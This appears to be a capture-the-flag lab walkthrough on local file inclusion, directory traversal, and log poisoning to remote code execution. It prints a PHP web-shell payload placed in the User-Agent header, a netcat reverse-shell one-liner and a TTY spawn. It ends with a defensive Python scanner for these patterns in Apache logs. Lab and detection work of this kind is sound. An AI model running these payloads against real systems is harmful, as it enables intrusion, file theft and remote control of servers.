[Task 1] Local File Inclusion
1. Start the VM and access it using your browser.
2. Access the first walkthrough, and add a parameter at the end of the link named “?page=”.
3. Let’s include the home page. At the “?page=” parameter enter home.html to include the home page.
4. What’s the message you get when you include the home.html?
ANS: It’s in #3
5. You can also read other system files. For example, you can read the passwd file. Type /etc/passwd in the parameter to read it.
View page source for easier viewing
6. Which user that is not present by default is there?
7. Well done! You’ve exploited your first local file inclusion!
[Task 2] Local File Inclusion using Directory Traversal
1. Now that we know what Directory Traversal is, let’s access the second walkthrough.
2. Add the “?page=” parameter, and try to include the home page again. Does it work (Yes/No)?
ANS: No
3. Suppose you have another page named “creditcard”, but it is in another directory. Let’s try finding it. Navigate one directory up, and try to include the file. Use “../” to move one directory up.
4. What are the credit card numbers?
ANS: It’s in #3
5. In the same way you can include the passwd file. You’ll have to move more directories up. Try reading the passwd file.
6. Well done! You’ve exploited your first LFI using Directory Traversal.
[Task 3] Reaching RCE using LFI and log poisoning
1. We got our hands a bit dirty with basic LFI and LFI using path traversal. Let’s dig a little deeper, and use log poisoning to get access to the underlying operating system.
2. We will inject some malicious PHP code into the server’s log.
Note: In order for that to happen, the directory should have read and execute permissions.
3. Access the third walkthrough, add the “?page=” parameter and let’s try reading the Apache log file.
The log file is located at the following path: /var/log/apache2/access.log
Access “/var/log/apache2/access.log”
View page source for easier viewing
4. Can you read the log (Yes/No)?
ANS: Yes
5. Since you can do it, let’s “poison” it!
Intercept the request with Burp Suite
Edit the User-Agent header with PHP code
<?php system($_GET['lfi']) ?>
Add lfi parameter to the request
Send the request to the Repeater (CTRL+R)
Add whoami to the lfi value
Here’s the result. User is “www-data”.
6. Give it a try and run uname -r. What’s the output of the command?
I removed all the User-Agent text except the PHP code. I also replaced the space in uname -r with “%20”, like this:
uname%20-r
7. With this knowledge read the flag from the lfi user home directory.
I will get a reverse shell.
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Create listener on port 1234
nc -lvp 1234
Paste reverse shell command
After a lot of attempts, I succeeded with this command.
Note: I had to send the request with each command at least twice to make sure whether it was working or not, and finally got the shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
Encode to url with Burp Suite Decoder
Copy to the request and send
Now I have a shell.
Spawn a TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
Get the flag
cd /home
ls
cd lfi
ls
cat flag.txt
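From the defender’s side, everything this room does leaves a trace in the same access.log that gets poisoned. As an added example (not part of the room or this walkthrough), here is a small Python scanner that flags the three request patterns seen above in Apache combined-format log lines: “../” traversal in the ?page= parameter, reads of sensitive paths such as /etc/passwd or /var/log/, and PHP tags in the User-Agent or Referer header. The log lines are constructed samples, not output from the VM.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines mirroring the walkthrough (not real logs).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /lab1/index.php?page=home.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /lab1/index.php?page=/etc/passwd HTTP/1.1" 200 1731 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /lab2/index.php?page=../creditcard HTTP/1.1" 200 93 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:14 +0000] "GET /lab3/index.php?page=..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log&lfi=whoami HTTP/1.1" 200 9912 "-" "<?php system($_GET['lfi']) ?>"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r"<\?(php|=)?", re.I)  # <?php, <?=, or a bare <?
SENSITIVE_PATHS = ("/etc/passwd", "/var/log/", "/proc/self/")


def classify(line):
    """Return (ip, target, findings) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    query = parse_qs(urlsplit(m["target"]).query)  # parse_qs already URL-decodes once
    for raw in query.get("page", []):
        val = unquote(raw)  # decode a second time to catch double-encoded "..%252F"
        if "../" in val or "..\\" in val:
            findings.append("traversal in page=")
        if any(s in val for s in SENSITIVE_PATHS):
            findings.append("sensitive file in page=")
    # Log poisoning plants PHP in a header that Apache writes to access.log verbatim.
    if PHP_TAG_RE.search(unquote(m["ua"])) or PHP_TAG_RE.search(unquote(m["referer"])):
        findings.append("php tag in header (log poisoning)")
    return m["ip"], m["target"], findings


def scan(text):
    """Return only the parsed lines that produced at least one finding."""
    return [r for r in (classify(l) for l in text.splitlines()) if r and r[2]]


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, "->", ", ".join(findings))
```

The benign home.html request produces no finding; the other three lines are flagged, and the poisoning request is flagged for all three reasons at once.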